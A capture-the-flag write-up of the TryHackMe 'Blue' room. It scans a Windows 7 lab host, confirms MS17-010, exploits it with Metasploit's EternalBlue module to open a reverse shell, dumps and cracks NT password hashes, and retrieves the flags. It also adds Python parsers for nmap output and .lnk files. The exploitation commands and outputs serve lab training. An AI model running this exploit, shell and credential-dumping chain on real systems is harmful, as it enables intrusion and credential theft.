Blue is a TryHackMe machine that is vulnerable to EternalBlue (MS17-010). We use Metasploit to configure and run the exploit against the vulnerability we find, and then retrieve the flags.
Room
Title        Blue
Description  Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
Points       630
Difficulty   Easy
Maker        DarkStar7471
MASSCAN & NMAP
UDP/TCP port scan and service detection.
root@kali:~/trymehack/blue# masscan -p1-65535,U:1-65535 10.10.24.91 --rate=1000 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-09-04 00:56:01 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49153/tcp on 10.10.24.91
Discovered open port 49154/tcp on 10.10.24.91
Discovered open port 49152/tcp on 10.10.24.91
Discovered open port 137/udp on 10.10.24.91
Discovered open port 3389/tcp on 10.10.24.91
# Nmap 7.70 scan initiated Tue Sep 3 21:03:21 2019 as: nmap -sC -sV -p1-1000 -o nmap.scan_mil 10.10.24.91
Nmap scan report for 10.10.24.91
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ae:0a:27:4e:02 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-09-03T20:04:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-09-03 21:04:00
|_ start_date: 2019-09-03 20:54:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 3 21:04:06 2019 -- 1 IP address (1 host up) scanned in 45.67 seconds
SMBCLIENT & SMBMAP
Share name enumeration.
root@kali:~/trymehack/blue# smbclient -L \\10.10.24.91
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.10.24.91]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.24.91 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
root@kali:~/trymehack/blue# smbmap -H 10.10.24.91
[+] Finding open SMB ports....
root@kali:~/trymehack/blue#
NMAP - SMB SCRIPTS
We use nmap's SMB scripts to check whether the machine is vulnerable to any of them, and find that it is vulnerable to MS17-010 (ETERNALBLUE).
root@kali:~/trymehack/blue# nmap --script smb-vuln-* 10.10.24.91
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-03 21:11 EDT
Nmap scan report for 10.10.24.91
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 42.25 seconds
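The host script results above already contain the three findings a defender should act on: SMBv1 message signing disabled, SMBv2 signing not required, and an unpatched MS17-010. As an added example (not part of the original writeup), the following Python snippet parses the nmap "Host script results" block and turns it into hardening findings. The sample is the output of the two scans above, re-indented the way nmap actually prints nested script lines (two extra spaces per nesting level, which the page extraction collapsed); the rules in `smb_findings` are my own.

```python
import re

# "Host script results" from the nmap scans above, re-indented the way nmap
# prints nested script output (two extra spaces per nesting level).
SAMPLE_HOST_SCRIPTS = """\
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ae:0a:27:4e:02 (unknown)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|_  System time: 2019-09-03T20:04:00-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
"""

# "|" or "|_" prefix, then the indentation that tells top-level from nested lines
LINE_RE = re.compile(r"^\|_?( *)(.*)$")


def parse_host_scripts(text: str) -> dict:
    """Group nmap host-script lines by script name.

    Returns {script_name: [lines]}. A one-line script such as nbstat maps to
    [its value]; a multi-line script maps to its nested lines, stripped.
    """
    scripts, current = {}, None
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        indent, body = len(m.group(1)), m.group(2).strip()
        if indent <= 1:                       # "| name:" or "|_name: value"
            name, _, value = body.partition(":")
            current = name.strip()
            scripts[current] = [value.strip()] if value.strip() else []
        elif current is not None:             # "|   nested: value"
            scripts[current].append(body)
    return scripts


def smb_findings(scripts: dict) -> list:
    """Turn the parsed SMB script output into hardening findings."""
    findings = []
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append("SMB1 message signing disabled")
        if line.startswith("account_used: guest"):
            findings.append("guest/anonymous SMB session accepted")
    for line in scripts.get("smb2-security-mode", []):
        if "not required" in line:
            findings.append("SMB2 message signing not required")
    for line in scripts.get("smb-vuln-ms17-010", []):
        if line.startswith("State:") and "VULNERABLE" in line:
            findings.append("MS17-010 (CVE-2017-0143): SMBv1 reachable and unpatched")
    return findings


if __name__ == "__main__":
    for finding in smb_findings(parse_host_scripts(SAMPLE_HOST_SCRIPTS)):
        print("[!]", finding)
```

The parser keys on indentation rather than on a list of known script names, so it works on any nmap normal-output file; to use it on your own scan, read the file and pass only the lines after "Host script results:".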
We use Metasploit with the exploit/windows/smb/ms17_010_eternalblue module against the machine, configure it and run the exploit.
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.24.91
rhosts => 10.10.24.91
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.1.72:4444
[+] 10.10.24.91:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.24.91:445 - Connecting to target for exploitation.
[+] 10.10.24.91:445 - Connection established for exploitation.
[+] 10.10.24.91:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.24.91:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.24.91:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.24.91:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.24.91:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.24.91:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.24.91:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.24.91:445 - Sending all but last fragment of exploit packet
[*] 10.10.24.91:445 - Starting non-paged pool grooming
[+] 10.10.24.91:445 - Sending SMBv2 buffers
[+] 10.10.24.91:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.24.91:445 - Sending final SMBv2 buffers.
[*] 10.10.24.91:445 - Sending last fragment of exploit packet!
[*] 10.10.24.91:445 - Receiving response from exploit packet
[+] 10.10.24.91:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.24.91:445 - Sending egg to corrupted connection.
[*] 10.10.24.91:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.8.1.72:4444 -> 10.10.24.91:49196) at 2019-09-03 21:15:49 -0400
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
UPGRADE SHELL - METERPRETER
We use the post-exploitation module multi/manage/shell_to_meterpreter to upgrade our shell to Meterpreter.
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)
msf5 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.1.72:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (179779 bytes) to 10.10.24.91
[*] Meterpreter session 2 opened (10.8.1.72:4433 -> 10.10.24.91:49203) at 2019-09-03 21:21:37 -0400
[*] Stopping exploit/multi/handler
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC 10.8.1.72:4433 -> 10.10.24.91:49203 (10.10.24.91)
msf5 post(multi/manage/shell_to_meterpreter) >
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
Jon:"Nah boi, I ain't sharing nutting with you"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
JOHN - CRACK PASSWORDS
We crack the passwords with John.
root@kali:~/trymehack/blue# john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
alqfna22 (Jon)
2g 0:00:00:00 DONE (2019-09-03 21:34) 2.061g/s 10515Kp/s 10515Kc/s 10520KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
root@kali:~/trymehack/blue#
FLAGS
Finding the flags.
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-07-13 23:18:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Program Files
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2009-07-13 23:20:08 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2018-12-12 22:13:22 -0500 Recovery
40777/rwxrwxrwx 4096 dir 2018-12-12 18:01:17 -0500 System Volume Information
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Users
40777/rwxrwxrwx 16384 dir 2009-07-13 23:20:08 -0400 Windows
100666/rw-rw-rw- 24 fil 2018-12-12 22:47:39 -0500 flag1.txt
567211570/r-xrwx--- 438533065912909807 fif 13905563959-04-24 15:54:40 -0400 hiberfil.sys
567211570/r-xrwx--- 438533065912909807 fif 13905563959-04-24 15:54:40 -0400 pagefile.sys
meterpreter > cat flag1.txt
flag{******************}
meterpreter > pwd
C:\
meterpreter >
We use dir to find the files whose name contains "flag".
Command:
C:\>dir flag* /s /p
dir flag* /s /p
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\
03/17/2019 02:27 PM 24 flag1.txt
1 File(s) 24 bytes
Directory of C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent
03/17/2019 02:26 PM 482 flag1.lnk
03/17/2019 02:30 PM 848 flag2.lnk
03/17/2019 02:32 PM 2,344 flag3.lnk
3 File(s) 3,674 bytes
Directory of C:\Users\Jon\Documents
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
Total Files Listed:
5 File(s) 3,735 bytes
0 Dir(s) 22,796,713,984 bytes free
C:\>
C:\>type C:\Users\Jon\Documents\flag3.txt
type C:\Users\Jon\Documents\flag3.txt
flag{*******************************}
C:\>
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>type flag2.lnk
type flag2.lnk
L�F� h+汖��h+汖��=]�����'P�O� �:i�+00�/C:\R1�M�Windows��:���M�*pWindowsV1qN��System32��:��qN��* System32P1�Mconfig��:���M*� configX2'�M flag2.txtヘM�M*�flag2.txtS-Rf
�C:\Windows\System32\config\flag2.txt6..\..\..\..\..\..\..\Windows\System32\config\flag2.txt�C:\Windows\System32\config( �1SPS�XF�L8C���&�m�`�Xjon-pc��̴�H�C�Kz�k��:������d)d�4
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>dir /ah C:\Windows\System32\config
dir /ah C:\Windows\System32\config
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Windows\System32\config
File Not Found
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>
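The garbled `type flag2.lnk` output above works at all because a Windows shortcut stores its target in clear text: the LocalBasePath inside the LinkInfo block and the relative path in the StringData section, which is why the full `C:\Windows\System32\config\flag2.txt` path is readable in the middle of the binary noise. Shortcuts in a user's Recent folder are a standard forensic source for the same reason. As an added example (not part of the writeup), this Python snippet parses those fields from the MS-SHLLINK format. Since the actual flag2.lnk is not available, `build_sample_lnk` constructs a minimal shortcut carrying the path and the volume serial shown in the session; the target size and timestamps are made-up values.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLinkHeader CLSID
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_RELATIVE_PATH, IS_UNICODE = 0x01, 0x02, 0x08, 0x80
# StringData sections in the order MS-SHLLINK stores them: (LinkFlags bit, name)
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))


def parse_lnk(blob: bytes) -> dict:
    """Extract target path, volume serial, target size and StringData from a .lnk."""
    if struct.unpack_from("<I", blob, 0)[0] != 0x4C or blob[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    info = {"local_path": None, "volume_serial": None,
            "target_size": struct.unpack_from("<I", blob, 52)[0]}   # FileSize field
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList; LinkInfo is what we want
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:
        start = pos
        size, _hdr, iflags, vol_off, base_off, _net_off, suffix_off = \
            struct.unpack_from("<7I", blob, start)

        def cstr(off: int) -> str:               # NUL-terminated ANSI string inside LinkInfo
            return blob[start + off:blob.index(b"\x00", start + off)].decode("cp1252")

        if iflags & 0x01:                        # VolumeIDAndLocalBasePath
            serial = struct.unpack_from("<I", blob, start + vol_off + 8)[0]  # DriveSerialNumber
            info["volume_serial"] = f"{serial >> 16:04X}-{serial & 0xFFFF:04X}"
            info["local_path"] = cstr(base_off) + cstr(suffix_off)
        pos = start + size
    for bit, key in STRING_DATA:                 # CountCharacters, then the characters
        if flags & bit:
            count = struct.unpack_from("<H", blob, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            info[key] = blob[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return info


def build_sample_lnk(local_path: str, relative_path: str, serial: int, target_size: int) -> bytes:
    """Construct a minimal shortcut (hypothetical sample, not the flag2.lnk from the box)."""
    flags = HAS_LINK_INFO | HAS_RELATIVE_PATH | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LNK_CLSID
              + struct.pack("<II", flags, 0x20)                # FILE_ATTRIBUTE_ARCHIVE
              + b"\x00" * 24                                   # three FILETIMEs, left at zero
              + struct.pack("<IIIH", target_size, 0, 1, 0)     # FileSize, IconIndex, SW_SHOWNORMAL, HotKey
              + b"\x00" * 10)                                  # Reserved1/2/3
    volume = struct.pack("<IIII", 17, 3, serial, 16) + b"\x00"  # size, DRIVE_FIXED, serial, empty label
    base = local_path.encode("cp1252") + b"\x00"
    suffix = b"\x00"
    link_info = struct.pack("<7I", 28 + len(volume) + len(base) + len(suffix), 28, 1,
                            28, 28 + len(volume), 0, 28 + len(volume) + len(base))
    string_data = struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    return header + link_info + volume + base + suffix + string_data + b"\x00" * 4  # terminal block


if __name__ == "__main__":
    sample = build_sample_lnk(r"C:\Windows\System32\config\flag2.txt",
                              r"..\..\..\..\..\..\..\Windows\System32\config\flag2.txt",
                              0xE6110B66, 34)      # serial from the dir output; size is made up
    print(parse_lnk(sample))
```

On a real shortcut, pass the file contents to `parse_lnk`; the volume serial it returns can be matched against the `Volume Serial Number` that `dir` prints to confirm the link was created on this disk rather than copied in from another machine.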
Our flag2 is located in C:\Windows\System32\config.
C:\Windows\system32>type C:\Windows\System32\config\flag2.txt
type C:\Windows\System32\config\flag2.txt
flag{****************************}
C:\Windows\system32>